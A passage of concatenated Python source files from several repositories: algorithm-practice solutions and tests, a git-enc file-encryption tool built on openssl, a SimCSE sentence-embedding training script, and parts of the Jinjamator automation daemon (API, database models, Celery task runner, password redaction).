def setUp(self):
self.sols = [Solution(min_index_nodup_1), Solution(min_index_nodup_2)]
def test_basics(self):
for sol in self.sols:
arr = [194,195,196,197,198,199,201,203,204,1,
2,3,4,5,6,7,8,9,11,12,
13,14,15,16,17,18,20,21,22,23,
24,25,26,27,29,30,31,32,33,34,
35,36,37,39,40,42,43,44,45,47,
48,49,50,51,52,53,54,55,57,58,
59,60,61,63,65,66,68,69,70,71,
73,74,76,77,79,80,81,82,83,84,
86,87,88,89,91,92,93,94,95,97,
98,99,101,103,104,105,106,107,108,109,
110,113,114,115,117,118,120,121,122,123,
124,127,128,130,131,133,134,135,136,137,
139,140,141,142,143,144,146,147,148,149,
150,151,152,153,154,155,158,159,160,161,
162,163,164,166,167,169,170,171,172,174,
175,177,178,179,181,182,184,185,187,189,
190,192,193]
self.assertEqual(sol.search(arr, 1), 9)
class DuplicateArrayTest(unittest.TestCase):
def test_basics(self):
arrays = [[1], [1,1], [1,2,3,4,5,6], [2,3,1,1], [3,3,3,3,3,3], [3,3,3,3,3,3,2,3]]
indexes = [0, 0, 0, 2, 0, 6]
for arr, idx in zip(arrays, indexes):
i, j = 0, len(arr)-1
self.assertEqual(min_index_dup_1(arr, i, j), idx)
if __name__ == "__main__":
unittest.main()
```
#### File: programming/dp/min_jumps_array.py
```python
from collections import deque
from itertools import chain
class GreedySolution:
# Time Complexity: O(len(A) + sum(A))
# @param A : list of integers
# @return an integer
def jump(self, A):
n = len(A)
here, target = 0, n-1
jumps = 0
while here < target:
here_jump = A[here]
theres = [here+dx for dx in range(1, here_jump+1) if here+dx < n]
if theres == []:
return -1
if here+here_jump >= target:
here = target
jumps += 1
else:
new_here = max([(there+A[there], there) for there in theres])[1]
here = new_here
jumps += 1
#assert here == target
return jumps
class DPSolution:
# Time Complexity: O(len(A) * max(A))
# @param A : list of integers
# @return an integer
def jump(self, A):
n = len(A)
start, stop = 0, n-1
#minjumps[i] := minimum jumps to reach ith position from starting point
#minjumps[k] == -1 means it's not reachable from the starting point
minjumps = [-1 for _ in range(n)]
minjumps[start] = 0
to_visit = deque([start])
while to_visit:
here = to_visit.popleft()
if here == stop:
return minjumps[here]
for there in self.possible_theres(here, A[here], minjumps):
if minjumps[there] >= 0:
continue
assert minjumps[there] == -1
minjumps[there] = 1 + minjumps[here]
to_visit.append(there)
return -1
def possible_theres(self, here, maxjump, minjumps):
n = len(minjumps)
for dx in chain(range(-maxjump,0), range(1,maxjump+1)):
there = here + dx
if 0 <= there < n:
yield there
import unittest
class SolutionTest(unittest.TestCase):
def setUp(self):
self.solutions = [GreedySolution(), DPSolution()]
def test_basics(self):
for sol in self.solutions:
self.assertEqual(sol.jump([2,2,1,0,4]), -1)
self.assertEqual(sol.jump([2,3,1,1,4]), 2)
if __name__ == "__main__":
unittest.main()
```
#### File: programming/greedy/gas_station.py
```python
class Solution:
# @param A : tuple of integers
# @param B : tuple of integers
# @return an integer
def canCompleteCircuit(self, A, B):
n = len(A)
start = 0
while start < n:
success, new_start = self.reachable_from(A, B, start)
if success:
return start
start = new_start
return -1
def reachable_from(self, A, B, start):
''' @return (success::bool, new_start::int) '''
i,t = start, 0
n = len(A)
tank = 0
while t < n:
gas, cost = A[i%n], B[i%n]
tank += gas - cost
if tank < 0: break
i, t = i+1, t+1
if t >= n:
return (True, n)
else:
return (False, i+1)
import unittest
class SolutionTest(unittest.TestCase):
def test_basics(self):
sol = Solution()
self.assertEqual(sol.canCompleteCircuit([1,2], [2,1]), 1)
self.assertEqual(sol.canCompleteCircuit([1,2], [99,99]), -1)
if __name__ == "__main__":
unittest.main()
```
#### File: programming/hashing/two_sum.py
```python
class Solution:
# @param A : tuple of integers
# @param B : integer
# @return a list of integers
def twoSum(self, A, B):
failmap = {}
for ai, av in enumerate(A, 1):
if B-av in failmap:
return [failmap[B-av], ai]
failmap[av] = ai
return []
import unittest
from math import nan
class SolutionTest(unittest.TestCase):
def test_basics(self):
sol = Solution()
self.assertEqual(sol.twoSum([], nan), [])
self.assertEqual(sol.twoSum([2, 7, 11, 15], 9), [1,2])
if __name__ == "__main__":
unittest.main()
```
#### File: quizzes/leetcode/0146_lrucache.py
```python
class LRUCache:
def __init__(self, capacity: int):
self.cap = capacity
self.d = {}
self.ll = LinkedList()
def get(self, key: int) -> int:
if key not in self.d:
return -1
n = self.d[key]
self.ll.movetoend(n)
return n.data[1]
def put(self, key: int, value: int) -> None:
if key in self.d:
n = self.d[key]
self.ll.movetoend(n)
n.data = (key, value)
return
if self.cap <= self.ll.sz:
old = self.ll.popleft()
self.d.pop(old.data[0])
node = Node((key, value))
self.ll.append(node)
self.d[key] = node
class Node:
__slots__ = ['data', 'prev', 'next']
def __init__(self, data):
self.data = data
self.prev, self.next = None, None
class LinkedList:
def __init__(self):
self.head, self.tail= None, None
self.sz = 0
def popleft(self):
if self.sz == 0:
return None
elif self.sz == 1:
n1 = self.head
self.head = self.tail = None
self.sz = 0
n1.next = None
return n1
else:
n1 = self.head
n2 = n1.next
n1.next = None
n2.prev = None
self.head = n2
self.sz -= 1
return n1
def append(self, node):
if self.sz == 0:
self.head = self.tail = node
self.sz = 1
else:
t1 = self.tail
t1.next = node
node.prev = t1
self.tail = node
self.sz += 1
def movetoend(self, node):
if node == self.tail:
return
#assert node != self.tail
if node == self.head:
n1 = self.head
n2 = n1.next
n1.next = None
n2.prev = None
self.head = n2
self.sz -= 1
self.append(n1)
else:
#assert node.prev
#assert node.next
pr, nx = node.prev, node.next
pr.next = nx
nx.prev = pr
node.next, node.prev = None, None
self.sz -= 1
self.append(node)
# Your LRUCache object will be instantiated and called as such:
# obj = LRUCache(capacity)
# param_1 = obj.get(key)
# obj.put(key,value)
'''
Runtime: 140 ms, faster than 51.55% of Python3 online submissions for LRU Cache.
Memory Usage: 21.7 MB, less than 6.96% of Python3 online submissions for LRU Cache.
'''
```
#### File: quizzes/leetcode/0287_find_dup.py
```python
def find_dup(ns):
if len(ns) <= 1:
return -1
slow, fast = ns[0], ns[ns[0]]
while slow != fast:
slow = ns[slow]
fast = ns[ns[fast]]
fast = 0
while fast != slow:
fast = ns[fast]
slow = ns[slow]
return slow
```
#### File: tools/dahyeprinter/test_printer.py
```python
import unittest
from printer import pages_in_order, _pairing, _taking_odd, _taking_even, _flattening
class PrinterTest(unittest.TestCase):
def test_even_pages(self):
tot_pages, per_each_page = 4, 1
fp, sp = pages_in_order(tot_pages, per_each_page)
self.assertEqual(fp, [1,3])
self.assertEqual(sp, [4,2])
def test_odd_pages(self):
tot_pages, per_each_page = 5, 1
fp, sp = pages_in_order(tot_pages, per_each_page)
self.assertEqual(fp, [1,3,5])
self.assertEqual(sp, [4,2])
def test_pairing_1(self):
tot_pages, per_each_page = 5, 1
paired = _pairing(tot_pages, per_each_page)
self.assertEqual(paired, [[1], [2], [3], [4], [5]])
def test_pairing_2(self):
tot_pages, per_each_page = 5, 2
paired = _pairing(tot_pages, per_each_page)
self.assertEqual(paired, [[1,2], [3,4], [5]])
tot_pages, per_each_page = 6, 2
paired = _pairing(tot_pages, per_each_page)
self.assertEqual(paired, [[1,2], [3,4], [5,6]])
def test_pairing_3(self):
tot_pages, per_each_page = 5, 4
paired = _pairing(tot_pages, per_each_page)
self.assertEqual(paired, [[1,2,3,4], [5]])
tot_pages, per_each_page = 8, 4
paired = _pairing(tot_pages, per_each_page)
self.assertEqual(paired, [[1,2,3,4], [5,6,7,8]])
def test_taking_odd(self):
l = [[1],[2],[3],[4],[5]]
o = _taking_odd(l)
self.assertEqual(o, [[1],[3],[5]])
def test_taking_even(self):
l = [[1],[2],[3],[4],[5]]
o = _taking_even(l)
self.assertEqual(o, [[2],[4]])
def test_flattening(self):
l = [[1],[2],[3],[4],[5]]
o = _flattening(l)
self.assertEqual(o, [1,2,3,4,5])
if __name__=="__main__":
unittest.main()
```
#### File: toyPoC/monad/monad.py
```python
def step1(x):
return "Hello " + x
def step2(x):
return x + ", monads aren't that complicated."
def step3(x):
return "***" + x + "***"
def prep01():
def run():
x = "friend"
x = step1(x)
x = step2(x)
x = step3(x)
return x
print(run()) # ***Hello friend, monads aren't that complicated.***
def prep02():
def wrap(x):
return x
def wrap_call(x, func):
return func(x)
def run():
x = "friend"
x = wrap(x)
x = wrap_call(x, step1)
x = wrap_call(x, step2)
x = wrap_call(x, step3)
return x
print(run()) # ***Hello friend, monads aren't that complicated.***
def prep03():
def wrap(x):
return "[" + x + "]"
def wrap_call(x, func):
return "[" + func(x[1:-1]) + "]"
def run():
x = "friend"
x = wrap(x)
x = wrap_call(x, step1)
x = wrap_call(x, step2)
x = wrap_call(x, step3)
return x
print(run()) #[***Hello friend, monads aren't that complicated.***]
## wrap = ret
## wrap_call = bind
## ret(a : A) :: A -> B
## bind(b : B, f : A->A) :: B -> B
def monad01():
def ret(x):
return "[" + x + "]"
def bind(x, func):
return "[" +func(x[1:-1]) + "]"
def run(ret, bind):
x = "friend"
x = ret(x)
x = bind(x, step1)
x = bind(x, step2)
x = bind(x, step3)
return x
print(run(ret, bind)) #[***Hello friend, monads aren't that complicated.***]
def monad02_practical():
def run(ret, bind):
x = "friend"
x = ret(x)
x = bind(x, step1)
x = bind(x, step2)
x = bind(x, step3)
return x
def ret(x):
print("Initial value:", x)
return "[" + x + "]"
def bind(x, func):
print("Input to next step is:", x)
result = func(x[1:-1])
print("Result is:", result)
return "[" + result + "]"
print(run(ret, bind))
# why practical
# 1. By adding a few simple lines to ret and bind, we can print out the value of x before and after each step.
# 2. Notice that without using a monad, we would have to write code for each step.
# 3. Since normally we only want to add print statements like this to our code temporarily, monads let us just swap the ret and bind functions around to change between production and debugging.
def monad03_withrealtype():
def ret(x):
return {"value": x, "count": 0}
def bind(x, func):
return {"value": func(x["value"]), "count": x["count"] + 1}
def run(ret, bind):
x = "friend"
x = ret(x)
x = bind(x, step1)
x = bind(x, step2)
x = bind(x, step3)
return x
print(run(ret, bind))
if __name__=='__main__':
prep01()
prep02()
prep03()
monad01()
monad02_practical()
monad03_withrealtype()
``` |
{
"source": "JiniousChoi/git-enc",
"score": 3
} |
#### File: JiniousChoi/git-enc/git_enc.py
```python
import yaml
import os, sys, argparse
from getpass import getpass
from subprocess import run
GITENCRYPT = ".gitencrypt"
GITENCPASSWORD = "<PASSWORD>"
def main():
args = parse_args()
if not args.cmd:
print("usage: {} -h".format(sys.args[0]))
return 1
ydict = yaml.load(open(GITENCRYPT))
if args.cmd == 'encrypt':
cmd_encrypt(ydict, args.password, args.paths)
elif args.cmd == 'decrypt':
cmd_decrypt(ydict, args.password, args.paths)
else:
assert("cannot reach here")
def parse_args():
usage = "usage: %prog [options] arg1 arg2"
parser = argparse.ArgumentParser(\
description='a utility tool for encrypting/decrypting confidential files.')
subparsers = parser.add_subparsers(title='available commands', dest='cmd')
add_encrypt_parser(subparsers)
add_decrypt_parser(subparsers)
# TODO
# addListParser(subparsers)
# addVerifyParser(subparsers)
return parser.parse_args()
def cmd_encrypt(ydict, password, paths):
password = get_password(password)
for path in paths:
for s,d in find_kvs_at(ydict, path):
run(['openssl', 'aes-256-cbc', '-k', password, '-in', s, '-out', d])
def cmd_decrypt(ydict, password, paths):
password = get_password(password)
for path in paths:
for s,d in find_kvs_at(ydict, path):
run(['openssl', 'aes-256-cbc', '-d', '-k', password, '-in', d, '-out', s])
def add_encrypt_parser(subparsers):
cmd = subparsers.add_parser('encrypt', help='encrypt files')
cmd.add_argument('-k', '--password', help='password for encrypt files')
cmd.add_argument('paths', nargs='*', help='a list of targeting groups to encrypt.')
def add_decrypt_parser(subparsers):
cmd = subparsers.add_parser('decrypt', help='decrypt files')
cmd.add_argument('-k', '--password', help='password for decrypt files')
cmd.add_argument('paths', nargs='*', help='a list of targeting groups to decrypt.')
def get_password(password):
if password:
return password
if GITENCPASSWORD in os.environ:
return os.environ[GITENCPASSWORD]
return getpass("type password: ")
def find_kvs_at(ydict, path):
def find_kvs(k, v):
if type(v) is str:
yield (k, v)
return
for k2, v2 in v.items():
yield from find_kvs(k2, v2)
sep = '.'
ks = path.split(sep)
it = ydict
for k in ks:
it = it[k]
return find_kvs(k, it)
if __name__ == "__main__":
main()
```
#### File: JiniousChoi/git-enc/test_git_enc.py
```python
import unittest
from git_enc import find_kvs_at
class GitencTest(unittest.TestCase):
def setUp(self):
self.d = {
'lv1-1': {
'lv2-1': {
'k1': 'v1',
'k2': 'v2'
},
'lv2-2': {
'k3': 'v3'
}
},
'lv1-2': {
'jin': 'choi'
}
}
def test_find_path_at(self):
actual = list(find_kvs_at(self.d, 'lv1-1'))
expected = [('k1','v1'), ('k2','v2'), ('k3','v3')]
self.assertEqual(actual, expected)
unittest.main()
``` |
{
"source": "JinJackson/Simcse-unsup",
"score": 2
} |
#### File: JinJackson/Simcse-unsup/train_unsup.py
```python
import argparse
import logging
import os
from pathlib import Path
from datasets import load_dataset
import torch
import torch.nn.functional as F
from torch.utils.data import DataLoader
from tqdm import tqdm
from transformers import BertTokenizer
from SimCSE import SimCSE
from CSECollator import CSECollator
#python train_unsup.py --train_file ./data/news_title.txt --pretrained./model/bert-wwm/
def parse_args():
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("--train_file", type=str, help="train text file")
parser.add_argument("--pretrained", type=str, default="hfl/chinese-bert-wwm-ext", help="huggingface pretrained model")
parser.add_argument("--model_out", type=str, default="./model", help="model output path")
parser.add_argument("--num_proc", type=int, default=5, help="dataset process thread num")
parser.add_argument("--max_length", type=int, default=100, help="sentence max length")
parser.add_argument("--batch_size", type=int, default=64, help="batch size")
parser.add_argument("--epochs", type=int, default=2, help="epochs")
parser.add_argument("--lr", type=float, default=1e-5, help="learning rate")
parser.add_argument("--tao", type=float, default=0.05, help="temperature")
parser.add_argument("--device", type=str, default="cuda", help="device")
parser.add_argument("--display_interval", type=int, default=50, help="display interval")
parser.add_argument("--save_interval", type=int, default=100, help="save interval")
parser.add_argument("--pool_type", type=str, default="cls", help="pool_type")
parser.add_argument("--dropout_rate", type=float, default=0.3, help="dropout_rate")
args = parser.parse_args()
return args
def load_data(args, tokenizer):
data_files = {"train": args.train_file}
ds = load_dataset("text", data_files=data_files)
ds_tokenized = ds.map(lambda example: tokenizer(example["text"]), num_proc=args.num_proc)
collator = CSECollator(tokenizer, max_len=args.max_length)
dl = DataLoader(ds_tokenized["train"],
batch_size=args.batch_size,
collate_fn=collator.collate)
return dl
def compute_loss(y_pred, tao=0.05, device="cuda"):
idxs = torch.arange(0, y_pred.shape[0], device=device)
y_true = idxs + 1 - idxs % 2 * 2
similarities = F.cosine_similarity(y_pred.unsqueeze(1), y_pred.unsqueeze(0), dim=2)
similarities = similarities - torch.eye(y_pred.shape[0], device=device) * 1e12
similarities = similarities / tao
loss = F.cross_entropy(similarities, y_true)
return torch.mean(loss)
def train(args):
tokenizer = BertTokenizer.from_pretrained(args.pretrained, mirror="tuna")
dl = load_data(args, tokenizer)
model = SimCSE(args.pretrained, args.pool_type, args.dropout_rate).to(args.device)
optimizer = torch.optim.AdamW(model.parameters(), lr=args.lr)
model_out = Path(args.model_out)
if not model_out.exists():
os.mkdir(model_out)
model.train()
batch_idx = 0
for epoch_idx in range(args.epochs):
for data in tqdm(dl):
batch_idx += 1
pred = model(input_ids=data["input_ids"].to(args.device),
attention_mask=data["attention_mask"].to(args.device),
token_type_ids=data["token_type_ids"].to(args.device))
loss = compute_loss(pred, args.tao, args.device)
optimizer.zero_grad()
loss.backward()
optimizer.step()
loss = loss.item()
if batch_idx % args.display_interval == 0:
logging.info(f"batch_idx: {batch_idx}, loss: {loss:>10f}")
if batch_idx % args.save_interval == 0:
torch.save(model.state_dict(), model_out / "epoch_{0}-batch_{1}-loss_{2:.6f}".format(epoch_idx, batch_idx, loss))
def main():
args = parse_args()
train(args)
if __name__ == "__main__":
log_fmt = "%(asctime)s|%(name)s|%(levelname)s|%(message)s"
logging.basicConfig(level=logging.INFO, format=log_fmt)
main()
``` |
{
"source": "jinjamator/ddom",
"score": 2
} |
#### File: ddom/tests/test_dom.py
```python
from ddom import *
import unittest
import logging
# logging.basicConfig(level=logging.DEBUG)
class TestObjectModel(unittest.TestCase):
def test_n5k_c5672up_chassis(self):
chassis = Chassis("n5k-c5672up", "cisco")
self.assertIsInstance(chassis, Chassis)
self.assertEqual(chassis.type, "chassis")
slot1_ports = chassis.find_children("port", {"parent.number": "1"})
self.assertEqual(len(slot1_ports), 49)
for idx, port in enumerate(slot1_ports):
if port.name.startswith("eth"):
self.assertEqual(port.name, f"eth1/{idx+1}")
self.assertEqual(port.pid, f"unified_sfp_plus")
if port.name.startswith("mgmt"):
self.assertEqual(port.name, f"mgmt0")
self.assertEqual(port.pid, f"1000-base-t")
slot2_ports = chassis.find_children("port", {"parent.number": "2"})
self.assertEqual(len(slot2_ports), 6)
for idx, port in enumerate(slot2_ports):
self.assertEqual(port.name, f"eth2/{idx+1}")
self.assertEqual(port.pid, f"qsfp")
def test_airflow(self):
chassis = Chassis("n5k-c5672up", "cisco")
psu_1 = PowerSupply("nxa-pac-1100w", "cisco")
psu_2 = PowerSupply("nxa-pac-1100w-b", "cisco")
fan_1 = Fan("n6k-c6001-fan-b", "cisco")
fan_2 = Fan("n6k-c6001-fan-f", "cisco")
fan_3 = Fan("n6k-c6001-fan-f", "cisco")
chassis.slot("PSU-1").connect(psu_1)
with self.assertRaises(InvalidAirFlowError):
chassis.slot("FAN-1").connect(fan_1)
chassis.slot("PSU-2").connect(psu_2)
chassis.slot("FAN-2").connect(fan_2)
chassis.slot("FAN-3").connect(fan_3)
def test_dom_access_by_name(self):
chassis = Chassis("n5k-c5672up", "cisco")
self.assertEqual(chassis.slot("SLOT-1").supervisor().port(1).name, "eth1/1")
self.assertEqual(
chassis.slot("SLOT-1").supervisor().port("eth1/48").name, "eth1/48"
)
with self.assertRaises(ChildNotFoundError):
chassis.slot("SLOT-2").linecard().port("eth1/10").name
def test_dom_access_by_index(self):
chassis = Chassis("n5k-c5672up", "cisco")
self.assertEqual(
chassis.slot_index(0).supervisor().port_index(0).name, "eth1/1"
)
self.assertEqual(
chassis.slot_index(0).supervisor().port_index(47).name, "eth1/48"
)
def test_dom_access_by_number(self):
chassis = Chassis("n5k-c5672up", "cisco")
self.assertEqual(chassis.slot(1).supervisor().port(1).name, "eth1/1")
self.assertEqual(chassis.slot(1).supervisor().port(48).name, "eth1/48")
def test_rj45_cable(self):
chassis = Chassis("n5k-c5672up", "cisco")
chassis2 = Chassis("n5k-c5672up", "cisco")
mgmt0 = chassis.find_children("port", {"name": "mgmt0"})[0].transceiver()
mgmt1 = chassis2.find_children("port", {"name": "mgmt0"})[0].transceiver()
cable = Cable("rj45-cat5e-rj45")
mgmt0.connect(cable)
mgmt1.connect(cable)
# print(chassis)
def test_to_yaml(self):
chassis = Chassis("n5k-c5672up", "cisco")
psu_1 = PowerSupply("nxa-pac-1100w", "cisco")
psu_2 = PowerSupply("nxa-pac-1100w", "cisco")
fan_1 = Fan("n6k-c6001-fan-f", "cisco")
fan_2 = Fan("n6k-c6001-fan-f", "cisco")
fan_3 = Fan("n6k-c6001-fan-f", "cisco")
chassis.slot("PSU-1").connect(psu_1)
chassis.slot("PSU-2").connect(psu_2)
chassis.slot("FAN-1").connect(fan_1)
chassis.slot("FAN-2").connect(fan_2)
chassis.slot("FAN-3").connect(fan_3)
yaml_string = chassis.to_yaml()
with open("create.yaml", "w") as fh:
fh.write(yaml_string)
chassis_restore = Chassis("n5k-c5672up", "cisco", yaml.safe_load(yaml_string))
yaml_restore_string = chassis_restore.to_yaml()
with open("restore.yaml", "w") as fh:
fh.write(yaml_restore_string)
self.assertEqual(
len(chassis_restore.find_children("slot", {"name": "FAN-1"})), 1
)
self.assertEqual(yaml_string, yaml_restore_string)
if __name__ == "__main__":
unittest.main()
``` |
{
"source": "jinjamator/jinjamator-core",
"score": 2
} |
#### File: daemon/api/restx.py
```python
import logging
import traceback
from flask_restx import Api
from flask import url_for
# from rest_api_demo import settings
from sqlalchemy.orm.exc import NoResultFound
log = logging.getLogger(__name__)
class Custom_API(Api):
@property
def specs_url(self):
"""
The Swagger specifications absolute url (ie. `swagger.json`)
:rtype: str
"""
return url_for(self.endpoint("specs"), _external=False)
api = Custom_API(
version="1.0", title="Jinjamator API", description="The REST API of Jinjamator"
)
@api.errorhandler
def default_error_handler(e):
message = "An unhandled exception occurred."
log.exception(message)
# if not settings.FLASK_DEBUG:
return {"message": message}, 500
@api.errorhandler(NoResultFound)
def database_not_found_error_handler(e):
log.warning(traceback.format_exc())
return {"message": "A database result was required but none was found."}, 404
```
#### File: backends/database/models.py
```python
from __future__ import absolute_import, unicode_literals
from datetime import datetime
import sqlalchemy as sa
from sqlalchemy.types import PickleType
from celery import states
from celery.five import python_2_unicode_compatible
from .session import ResultModelBase
__all__ = ("Task", "TaskSet", "JobLog")
@python_2_unicode_compatible
class Task(ResultModelBase):
"""Task result/status."""
__tablename__ = "celery_taskmeta"
__table_args__ = {"sqlite_autoincrement": True}
id = sa.Column(
sa.Integer,
sa.Sequence("task_id_sequence"),
primary_key=True,
autoincrement=True,
)
task_id = sa.Column(sa.String(155), unique=True, index=True)
status = sa.Column(sa.String(50), default=states.PENDING)
result = sa.Column(PickleType, nullable=True)
date_done = sa.Column(
sa.DateTime, default=datetime.utcnow, onupdate=datetime.utcnow, nullable=True
)
date_scheduled = sa.Column(sa.DateTime, default=datetime.utcnow, nullable=True)
date_start = sa.Column(sa.DateTime, default=datetime.utcnow, nullable=True)
traceback = sa.Column(sa.Text, nullable=True)
jinjamator_task = sa.Column(sa.String(1024), nullable=False, default="")
created_by_user_id = sa.Column(sa.Integer, nullable=False)
def __init__(self, task_id):
self.task_id = task_id
def to_dict(self):
return {
"task_id": self.task_id,
"status": self.status,
"result": self.result,
"traceback": self.traceback,
"date_done": self.date_done,
"date_start": self.date_start,
"date_scheduled": self.date_scheduled,
"jinjamator_task": self.jinjamator_task,
"created_by_user_id": self.created_by_user_id,
}
def __repr__(self):
return "<Task {0.task_id} for {0.jinjamator_task} state: {0.status}>".format(
self
)
@python_2_unicode_compatible
class TaskSet(ResultModelBase):
"""TaskSet result."""
__tablename__ = "celery_tasksetmeta"
__table_args__ = {"sqlite_autoincrement": True}
id = sa.Column(
sa.Integer,
sa.Sequence("taskset_id_sequence"),
autoincrement=True,
primary_key=True,
)
taskset_id = sa.Column(sa.String(155), unique=True)
task_id = sa.Column(sa.String(155))
result = sa.Column(PickleType, nullable=True)
date_done = sa.Column(sa.DateTime, default=datetime.utcnow, nullable=True)
def __init__(self, taskset_id, result):
self.taskset_id = taskset_id
self.result = result
def to_dict(self):
return {
"taskset_id": self.taskset_id,
"result": self.result,
"date_done": self.date_done,
}
def __repr__(self):
return "<TaskSet: {0.taskset_id}>".format(self)
@python_2_unicode_compatible
class JobLog(ResultModelBase):
"""JobLog result."""
__tablename__ = "logs"
__table_args__ = {"sqlite_autoincrement": True}
id = sa.Column(
sa.Integer,
sa.Sequence("logs_id_sequence"),
autoincrement=True,
primary_key=True,
)
task_id = sa.Column(sa.String(155), nullable=False, index=True)
timestamp = sa.Column(sa.DateTime, nullable=False)
message = sa.Column(sa.UnicodeText(), nullable=False, default="")
configuration = sa.Column(sa.UnicodeText(), nullable=False, default="")
parent_tasklet = sa.Column(sa.UnicodeText(), nullable=False, default="")
parent_task_id = sa.Column(sa.UnicodeText(), nullable=False, default="")
current_task = sa.Column(sa.UnicodeText(), nullable=False, default="")
current_tasklet = sa.Column(sa.UnicodeText(), nullable=False, default="")
current_task_id = sa.Column(sa.String(255), nullable=False, default="")
level = sa.Column(sa.String(64), nullable=False, default="")
stdout = sa.Column(sa.UnicodeText(), nullable=False, default="")
exc_info = sa.Column(sa.UnicodeText(), nullable=False, default="")
created_by_user_id = sa.Column(sa.Integer, nullable=False)
def __repr__(self):
return "<job {0}>".format(self.id)
```
#### File: genson/schema/node.py
```python
from .generators import GENERATORS, Typeless
class SchemaGenerationError(RuntimeError):
pass
class SchemaNode(object):
"""
Basic schema generator class. SchemaNode objects can be loaded
up with existing schemas and objects before being serialized.
"""
generator_classes = GENERATORS
def __init__(self):
self._schema_generators = []
def add_schema(self, schema):
"""
Merges in an existing schema.
arguments:
* `schema` (required - `dict` or `SchemaNode`):
an existing JSON Schema to merge.
"""
# serialize instances of SchemaNode before parsing
if isinstance(schema, SchemaNode):
schema = schema.to_schema()
for subschema in self._get_subschemas(schema):
# delegate to SchemaType object
schema_generator = self._get_generator_for_schema(subschema)
schema_generator.add_schema(subschema)
# return self for easy method chaining
return self
def add_object(self, obj):
"""
Modify the schema to accommodate an object.
arguments:
* `obj` (required - `dict`):
a JSON object to use in generating the schema.
"""
# delegate to SchemaType object
schema_generator = self._get_generator_for_object(obj)
schema_generator.add_object(obj)
# return self for easy method chaining
return self
def to_schema(self):
"""
Convert the current schema to a `dict`.
"""
types = set()
generated_schemas = []
for schema_generator in self._schema_generators:
generated_schema = schema_generator.to_schema()
if len(generated_schema) == 1 and "type" in generated_schema:
types.add(generated_schema["type"])
else:
generated_schemas.append(generated_schema)
if types:
if len(types) == 1:
(types,) = types
else:
types = sorted(types)
generated_schemas = [{"type": types}] + generated_schemas
if len(generated_schemas) == 1:
(result_schema,) = generated_schemas
elif generated_schemas:
result_schema = {"anyOf": generated_schemas}
else:
result_schema = {}
return result_schema
def __len__(self):
return len(self._schema_generators)
def __eq__(self, other):
# TODO: find a more optimal way to do this
if self is other:
return True
if not isinstance(other, type(self)):
return False
return self.to_schema() == other.to_schema()
def __ne__(self, other):
return not self.__eq__(other)
# private methods
def _get_subschemas(self, schema):
if "anyOf" in schema:
return [
subschema
for anyof in schema["anyOf"]
for subschema in self._get_subschemas(anyof)
]
elif isinstance(schema.get("type"), list):
other_keys = dict(schema)
del other_keys["type"]
return [dict(type=tipe, **other_keys) for tipe in schema["type"]]
else:
return [schema]
def _get_generator_for_schema(self, schema):
return self._get_generator_for_("schema", schema)
def _get_generator_for_object(self, obj):
return self._get_generator_for_("object", obj)
def _get_generator_for_(self, kind, schema_or_obj):
# check existing types
for schema_generator in self._schema_generators:
if getattr(schema_generator, "match_" + kind)(schema_or_obj):
return schema_generator
# check all potential types
for schema_generator_class in self.generator_classes:
if getattr(schema_generator_class, "match_" + kind)(schema_or_obj):
schema_generator = schema_generator_class(type(self))
# incorporate typeless generator if it exists
if self._schema_generators and isinstance(
self._schema_generators[-1], Typeless
):
typeless = self._schema_generators.pop()
schema_generator.add_schema(typeless.to_schema())
self._schema_generators.append(schema_generator)
return schema_generator
# no match found, if typeless add to first generator
if kind == "schema" and Typeless.match_schema(schema_or_obj):
if not self._schema_generators:
self._schema_generators.append(Typeless(type(self)))
schema_generator = self._schema_generators[0]
return schema_generator
# no match found, raise an error
raise SchemaGenerationError(
"Could not find matching type for {0}: {1!r}".format(kind, schema_or_obj)
)
```
#### File: task/celery/__init__.py
```python
from celery import Celery
from jinjamator.task import JinjamatorTask
import importlib
import sys
import os
from time import sleep
import collections
import logging
import json
from celery.exceptions import Ignore
from jinjamator.daemon import celery
from jinjamator.task.celery.loghandler import CeleryLogHandler, CeleryLogFormatter
from jinjamator.task import TaskletFailed
from copy import deepcopy
@celery.task(bind=True)
def run_jinjamator_task(self, path, data, output_plugin, user_id):
"""
Jinjamator Celery Task runner.
"""
self.update_state(
state="PROGRESS",
meta={
"status": "setting up jinjamator task run",
"configuration": {"root_task_path": path, "created_by_user_id": user_id},
},
)
formatter = CeleryLogFormatter()
log_handler = CeleryLogHandler()
formatter.created_by_user_id = user_id
log_handler.created_by_user_id = user_id
log_handler.setLevel(logging.DEBUG)
log_handler.setFormatter(formatter)
log_handler.set_celery_task(self)
log_handler.formatter.set_root_task_path(path)
# if "jinjamator_pre_run_tasks" in data:
# for pre_run_task in data["jinjamator_pre_run_tasks"]:
# task = JinjamatorTask()
# task._configuration._data["jinjamator_job_id"] = self.request.id
# log_handler.formatter.set_jinjamator_task(task)
# task._scheduler = self
# task._log.addHandler(log_handler)
# task._log.setLevel(logging.DEBUG)
# if "output_plugin" in pre_run_task["task"]:
# task.load_output_plugin(pre_run_task["task"]["output_plugin"])
# else:
# task.load_output_plugin("console")
# task.configuration.merge_dict(pre_run_task["task"]["data"])
# task._configuration.merge_dict(
# celery.conf["jinjamator_private_configuration"]
# )
# task.configuration.merge_dict(deepcopy(data))
# task.load(pre_run_task["task"]["path"])
# task._log.info(
# "running pre run task {}".format(pre_run_task["task"]["path"])
# )
# if not task.run():
# raise Exception("task failed")
# task._log.handlers.remove(log_handler)
# log_handler._task = None
# del task
self.update_state(
state="PROGRESS",
meta={
"status": "running main task",
"configuration": {"root_task_path": path, "created_by_user_id": user_id},
},
)
task = JinjamatorTask()
task._configuration._data["jinjamator_job_id"] = self.request.id
task._scheduler = self
log_handler.formatter.set_jinjamator_task(task)
task._log.setLevel(logging.DEBUG)
task._log.addHandler(log_handler)
task.load_output_plugin(
output_plugin,
celery.conf["jinjamator_private_configuration"][
"global_output_plugins_base_dirs"
],
)
task._configuration.merge_dict(celery.conf["jinjamator_private_configuration"])
task.configuration.merge_dict(data)
task.load(path)
try:
task.run()
except TaskletFailed:
raise Exception("task failed")
return {
"status": "finished task",
"stdout": task._stdout.getvalue(),
"log": log_handler.contents,
}
```
#### File: jinjamator/tools/password.py
```python
redacted_passwords = []
def redact(obj, is_password=False):
if isinstance(obj, str):
if is_password:
if obj not in redacted_passwords:
redacted_passwords.append(obj)
obj = "__redacted__"
return redacted_passwords, obj
elif isinstance(obj, list):
for index, item in enumerate(obj):
obj[index] = redact(item)[1]
return redacted_passwords, obj
elif isinstance(obj, dict):
for k, v in obj.items():
if (
("pass" in k and isinstance(v, str))
or (k.endswith("_key") and isinstance(v, str))
